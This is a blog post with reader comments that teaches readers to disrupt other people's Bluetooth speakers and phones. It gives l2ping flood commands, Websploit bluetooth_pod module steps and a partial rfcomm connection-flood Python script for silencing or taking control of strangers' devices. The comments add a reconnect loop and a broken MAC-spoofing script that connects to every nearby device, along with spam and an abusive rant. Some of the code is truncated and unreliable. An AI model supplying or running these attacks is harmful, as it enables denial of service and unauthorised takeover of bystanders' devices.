DDoS attacks on Bluetooth. How to disable annoying portable speakers

Gangs of teenagers with portable Bluetooth speakers playing loud music drive me nuts. Today, I will explain how to neutralize this ‘natural disaster’ without (OK, almost without) committing a criminal offense.

Modern Wi-Fi routers can filter out unwanted packets, but the majority of Bluetooth adapters are dumb, to say the least. They neither care what packets you send, nor what is their size and number. Therefore, you can increase the information volume of a ping packet in Linux to a tremendous size and then send 1000 such packets to a Bluetooth device.

First, you have to find a suitable device within the range using the command

$ hcitool scan

The command displays the list of available Bluetooth devices and their MAC addresses. If your system cannot see a Bluetooth adapter, try installing a Bluetooth manager for Linux. For instance, in Kali, I use gnome-bluetooth installed by the command:

$ apt-get install gnome-bluetooth

Alternatively, you can use the blueman utility:

$ apt-get install blueman

After getting the list of potential victims, attack them using one of the methods below:

Method 1. l2ping

Enter the command:

$ l2ping -i hci0 -s  -f 

It will generate packets with the size specified by the parameter and send them to the MAC address specified by the parameter. As a result, you will observe the following situation: the response time in the terminal is steadily growing, and the Bluetooth function on the attacked device stops working. After a while, it will turn on again – but the annoying loud music would be off for some time bringing you malicious satisfaction.


The above scheme works fine if the attacked device (e.g. a smartphone) us connected to headphones or a speaker via Bluetooth. After the attack, the two devices won’t be able to reconnect with each other.

Method 2. Websploit

There is also a more elegant way to silence a speaker producing rap sounds. Launch the Websploit utility:

$ websploit

Enter the following command in the console:

$ show modules

It will display all modules compatible with this utility; there are plenty of Wi-Fi components, but you need the bluetooth/bluetooth_pod module.

$ use bluetooth/bluetooth_pod

Now you have to set up the parameters and specify the attacked device:

$ show options
$ set bdaddr 

To make sure that Bluetooth is killed, change the size of the outgoing packet:

$ set size 999

Time to launch the ‘silence machine’:

$ run

The resultant picture is the same: the ping duration increases, and the music stops. Terrific!

The above two methods are effective against nearly all Bluetooth speakers, headphones, and other similar devices. This is because their manufacturers are too lazy to release firmware updates enabling the filtering of incoming packets. Therefore, if you have a Linux laptop, you can silence any speaker within its range.

If the speaker withstands the attack, you may try sending packets to the phone connected to it. I tested this method on a powerful JBL Xtreme speaker, and it withstood the load. But cheap made-in-China devices are effectively silences by this attack.

Ready-to-use jammers

Online stores offer exciting devices, including jammers operating at certain frequencies. Such gadgets may cost good money and offer various capabilities. Some of them kill all mobile signals, including Wi-Fi and Bluetooth, at once, while others cannot even jam H+.

If you really need such a device, I strongly recommend to research the respective articles in the national legislation prior to purchasing it. In some countries, you have to register your jammer with the authorities; failure to do so results in administrative or criminal liability.

Connecting to another device.

As discussed above, simple speakers and headphones almost never filter out the received packets. But what if you send to such a device not a just ping packet, but a packet containing a connection request? Or many such packets?

Not all manufacturers take precautions against the buffer overflow error. What happens if the received packets are lined up, and no space is left to store new requests? In such a situation, the speaker would try to execute the command and concurrently clear the buffer.

Therefore, use the standard Bluetooth communication protocol, rfcomm. Too bad, the utility controlling this protocol doesn’t allow to send a thousand of such requests. So, I am going to write a short Python script automating the process.

#!/usr/bin/env python
import subprocess

cmd=['rfcomm', 'connect', '', '1']

for i in range(0, 1001):

Before running the script, you have to find out the MAC address of the device. Use the above mentioned hcitool scan command and insert the retrieved address into the script instead of the . Save the script and execute it:

$ python 

The success or failure of the script execution will depend on the model of the attacked device (to be specific, on the time required to fill its buffer). If the buffer becomes full prior to the flushing, the command will be executed, and you connect to the speaker simultaneously with its legitimate user. However, if the buffer is flushed first, you will have to run the script again.

After the successful execution of the script, you can throw your own disco party or disable the device. My experiments with JBL Xtreme resulted in its shutdown, while JBL Flip 2 has passed under my full control.

Let the silence be with you! Good luck!

14 Responses to “DDoS attacks on Bluetooth. How to disable annoying portable speakers”

  1. So I tried both with l2ping and websploit, neither worked. I’m practicing with a Bluetooth speaker I have, first thing I noticed is that after the speaker is connected to the phone, it doesn’t show up in hcitool scan anymore (which would be a problem when attacking loud speakers in public). But even if I write down the address when it shows up, l2ping says “host is down” (which is not true).

    websploit simply hangs, won’t do anything.

    Any advice? is there any simple way to do a physical jammer with a raspberry pi and a couple of antennas or something?

  2. Hello there.
    I like your work 😉

    I also came with a little hack by myself. Not sure if it works.
    However I’ll put it there. If you managed to get the connection on the friggin noise maker you can force it to keep connection to you with a loop. Here it is
    while true sleep 3; do rfcomm connect 00:00:00:00:00:00 port number; done. Any attempts to connect might result in a rejection. I guess we will need to set the noisy bt device to slave first. This plus the ping flood might silence the kid for a while 😉 Also. Running your script from a mobile phone or an Arduino might also be a fine solution.

    Thanks again.

  3. Wireless Bluetooth Speaker with Rechargeable Battery. Compatible with MP3/4 devices, TF/USB Flash Drive, or any audio device which is Bluetooth compatible or has a 3.5mm jack. wireless speaker offers sound. It is a comprehensive portable Bluetooth speaker which is waterproof and shockproof , that delivers surprisingly powerful charging, and room-filling stereo sound everywhere. You just need to pair you phone or other music player which support Bluetooth with the speaker. After paired, you can enjoy the music with speakers that offer you.

  4. Commander Crash

    This script will work in a loop.
    import os
    import random
    import subprocess
    import bluetooth

    # List of MAC addresses to exclude
    excluded_macs = [“AA:BB:CC:DD:EE:FF”, “11:22:33:44:55:66″]

    # Loop indefinitely
    while True:
    # Generate a new MAC address
    new_mac = [0x00, 0x16, 0x3e, random.randint(0x00, 0x7f),
    random.randint(0x00, 0xff), random.randint(0x00, 0xff)]
    new_mac_str = ‘:’.join(‘%02x’ % b for b in new_mac)

    # Change the MAC address using hcitool
    os.system(f’sudo hcitool -i hci0 cmd 0x03 0x0005 {new_mac[0]:02X} {new_mac[1]:02X} {new_mac[2]:02X} {new_mac[3]:02X} {new_mac[4]:02X} {new_mac[5]:02X}’)

    # Connect to the device using rfcomm
    cmd = [‘rfcomm’, ‘connect’, ”, ‘1’]
    for i in range(0, 1001):

    # Discover nearby Bluetooth devices
    nearby_devices = bluetooth.discover_devices()

    # Loop through the nearby devices
    for mac_address in nearby_devices:
    # Check if the MAC address is in the excluded list
    if mac_address in excluded_macs:

    # Try to connect to the device
    print(“Connecting to device:”, mac_address)
    socket = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
    socket.connect((mac_address, 1))
    # Do something with the device here
    # …

    # Disconnect from the device
    print(“Disconnected from device:”, mac_address)

    # Failed to connect to the device
    print(“Failed to connect to device:”, mac_address)

  5. Bryan Hilliard

    Thanks for not specifying the parameters in ur censored document about criminal activity once again I’ve been gate kept and sanitized… There’s three parameters in which two are used so that means there’s like 6 possible combos it could be but I’m not a tinkerer and find bullshit like this tedious… Ur article sucks and we all know code exploitation is the real hacking not sum script kiddie bullshit… No click exploits impress me… Now could u just cut the shit and tell me which parameters use what information… Oh wait that’s right I don’t need to be commiting crimes oops hey guess what FUCK THE NSA AND THE FBI AND THE FCC I USE NO DISCRETION WHEN HACKING EVER COME FUCKING CATCH ME

Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>